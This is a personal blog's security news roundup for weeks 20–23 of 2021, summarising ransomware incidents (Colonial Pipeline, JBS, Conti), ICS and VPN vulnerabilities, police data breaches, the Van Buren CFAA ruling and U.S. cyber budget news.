2021 Week 20 - 23 Security Roundup
Summary
Sorry for the delay. I had training for work and a class that I thought would be 6 weeks that turned out to be 3 weeks which took up all my time. This is longer than normal for that reason and also because there was a lot of news. I also want to apologize for some formatting issues. Somehow I managed to break the blogger editor on this post. It might be because of the size. Hopefully, all will be back to normal next week.
A lot of different topics to cover this week. Both old and new. This includes more information on the Darkside attack, several new attacks on local governments, and emerging techniques used by threat actors.
News
Colonial Pipeline Ransomware Hack
We are learning more and more about this and the Monday morning quarterbacks are starting to second-guessing everything. One thing that has come out is that much like the Ireland HSE attack earlier this year, the decryptor was produced so slowly that Colonial was allegedly able to restore systems without it. It was also disclosed that Darkside lost access to several of its servers and had a large sum of cryptocurrency removed from its accounts. Was the U.S. CyberCom responsible? They say no, but it is doubtful they would say anything else, as an admission they were the ones could be legally tricky.
Bug in Siemens PLC's could let hacker run code
Siemens has released firmware updates to address a vulnerability in SIMATIC S7-1200 and S7-1500 Programmable Logic Controllers (PLCs) that could allow bad actors to gain access to protected areas of memory remotely through TCP port 102. Once they gain access, they can gain unrestricted access and execute code undetected. This bug has been given CVE-2020-15782 with a score of 8.1. There is no current evidence that the exploit has been used in the wild.
JBS Meat Processing Ransomware
I debated about including this, but it does affect global agricultural infrastructure, so ultimately I decided that the JBS attack warranted some coverage. This is by far the largest attack against the agricultural industry in history. JBS has operations in North and South America as well as Australia. The US's FBI attributed the attack on the Brazil-based company to REviL, which is a Russian-speaking gang that has made news for their extremely large ransomware demands in the last few months. While REviL has not taken responsibility for the attack themselves, in October their representative know as UNKN said that the agricultural sector would be the next target for the group.
JBS would not answer questions about paying the ransom but did indicate that backups were not affected by the lockdown. The White House also declined to answer any questions on the attack but made a generic statement that the harboring of Privateers and others in the borders of Russia would be a topic of discussion in upcoming talks with Vladimir Putin in the coming weeks.
Local Government breached by an APT
The US FBI announced that a new APT group attacked the webserver of a municipal government. After gaining access to the webserver they then pivoted to other parts of the Information Technology network. It appears that the group used a known issue (see links below) in a Fortigate appliance. The group appears to have used very sophisticated techniques and are suspected to have been active in other areas.
Fortinet CVE's and news
Government resources
Chinese APT groups still attempting to access Pulse Secure VPN's
As previously disused groups who have the best interests of the Chinese government created a toolkit to breach Pulse Secure VPN's used by governments of all sizes in the western world. New research indicates that the groups are still actively trying to exploit the bugs covered in CVE-2021-22893. The bad actors are using four new kits that are being named Bloodmine, Bloodbank, CleanPulse, and RapidPulse. This brings the number of toolkits designed to take advantage of the bug to 16. The report from Mandiant names the 3 groups in their most recent report as UNC2630 and UNC2717.
Ryuk Ransomware group target victims
The Ryunk group is still actively trying to get into critical infrastructure providers to include health, power, water, energy, schools, and SLTT's. CISA has general guidance for operators to defend against many common ransomware attacks which I will link below. What is new in the latest rounds of attacks is that they have moved from using off-the-shelf hacking tools to gain access to the systems and instead are now using PowerShell and other built-in tools of common operating systems to avoid detection. This has been a trend I have noticed from several threat groups over the last year or so.
CISA guidance
Korenix Technology chips have major vulnerabilities
Korenix makes chips that go into many industrial network switches. Since it is the core chips that are vulnerable, many of the end products are not able to be effectively patched in a timely manner, with some still vulnerable 1 year after disclosure of the flaws. This is putting much of the world's critical manufacturing and infrastructure like water and power production/distribution at extreme risk.
FBI warns of 16 Conti ransomware attacks targeting healthcare and first responder networks
To date, Conti has hit around 400 agencies worldwide to include 911/dispatch centers, police, emergency medical services, hospitals, municipal governments, and first responders. Dublin's High Court has issued an injunction against "persons unknown" in response to an attack against the Ireland Health system.
TrendMicro has a playbook for responding to Conti/Ryuk ransomware here: https://success.trendmicro.com/solution/000286405
FBI alert
Azusa and Police Department breached
The city of Azusa Arizona made a public notification that certain systems had been breached resulting in the removal of some information. They did not specify exactly what but did indicate it could include Social Security numbers, drivers license numbers, California ID card numbers, passport information, military ID numbers, financial information, medical information, health insurance information, and/or the information collected as part of their Automated Licenses Plate recognition system. They are asking anyone who has done business with or had contact with law enforcement to monitor their credit.
Clearfield Borough Police Department has a data breach
The Marketo leaked data marketplace extortion portal is advertising that they have the entire database of the Clearfield Borough Pennsylvania Police Department available. The department is not confirming or denying the breach, but a 28 gig sample seems to have a lot of sensitive data.
Police breaches may affect criminal cases
There is growing concern that these ransomware attacks against police forces in the US and other countries may impact the prosecution of criminals. A growing trend of the attackers is to not only ransom the release of the hardware and software systems, but also the release of the information to the dark or worldwide webs. In some cases, the bad actors are even reaching out to those who are the subjects of the data and demanding payment from them as well.
Texas unemployment System defrauded
Scattered Canary, a Nigerian cybercriminal gang, was tricked into sharing a step-by-step guide on how to commit unemployment identity fraud by cybersecurity firm Agari. Texas joins the states of Hawaii, Florida, Massachusetts, North Carolina, Oklahoma, Rhode Island, Washington, and Wyoming in being defrauded by the group.
Legislative actions
United States Supreme Court narrows the scope of the U.S. hacking law known as the Computer Fraud and Abuse Act (CFAA). In their 6-3 ruling they overturned the case of Nathan Van Buren who was fired and charged on the CFAA for looking up the information of a woman one of his informants met at a strip club in exchange for $5,000. He argued that while it might have been against department policies to use the state database for such things, it should not be against the CFAA as the term unauthorized use was too broad to be legally enforceable. Up until this point, prosecutors had successfully argued that the act "exceeded authorized access" which was legally covered under the CFAA. The ruling means that rogue employees that have legitimate access to work resources cannot be held legally responsible for the misuse, however, it would seem they could still be disciplined or even terminated for such activity.
Brazil has passed new legislation designed to get tough on cyber/online crime. 14.155 altered the Brazilian Penal Code to add more strict penalties for device invasion, theft, and misconduct in digital media environments. It also stiffed penalties for crimes committed with information that was gained through fraudulent emails, social networks, or telephone conversations.
The Biden administration is seeking a $750 million budget to respond to SolarWindows and billions more for cyber defense. The budget is asking for a 14% increase to 9.8 billion and would include money for the national cyber director office, a new Cyber Response and Recovery Fund, and increases to the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency.
Jobs
The city of Claremore Oklahoma has an IT tech position they will be hiring for in the coming weeks. To get more information and apply go to: https://www.claremorecity.com/jobs
Comments
Post a Comment